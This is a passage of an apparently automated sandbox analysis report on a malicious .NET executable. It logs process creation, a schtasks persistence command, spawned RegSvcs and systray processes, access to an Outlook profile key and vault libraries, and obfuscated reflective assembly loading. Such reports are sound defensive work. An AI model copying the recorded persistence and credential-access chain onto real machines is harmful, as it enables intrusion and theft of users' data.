                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\systray.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: MN1qo2qaJmEvXDP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: MN1qo2qaJmEvXDP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780554280.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4781364571.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.MN1qo2qaJmEvXDP.exe.27a9f8c.0.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.cs | .Net Code: nIUgB65bQXpUkNhlvYn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.cs | .Net Code: nIUgB65bQXpUkNhlvYn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.cs | .Net Code: nIUgB65bQXpUkNhlvYn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.7500000.7.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.3e62378.6.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 11.2.rlJvZXSinaRi.exe.326a0f0.0.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_07C8D380 pushfd ; retf | 0_2_07C8D381
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_0966C990 push 400905A8h; iretd | 0_2_0966C995
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_096663F2 pushad ; retf | 0_2_096663F9
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe | Code function: 0_2_09666430 pushfd ; retf | 0_2_09666431
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004071DE push 6FB25C47h; retf | 10_2_004071E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004031B0 push eax; ret | 10_2_004031B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040B9B7 push ebp; retf | 10_2_0040B9BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004172E9 push dword ptr [esi+eax*2+5Fh]; retf | 10_2_004172F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004133E3 push ss; retn A658h | 10_2_0041350B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00414BF2 push edi; ret | 10_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00414C28 push edi; ret | 10_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00418D95 pushfd ; retf | 10_2_00418DAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00415661 push edx; iretd | 10_2_00415662
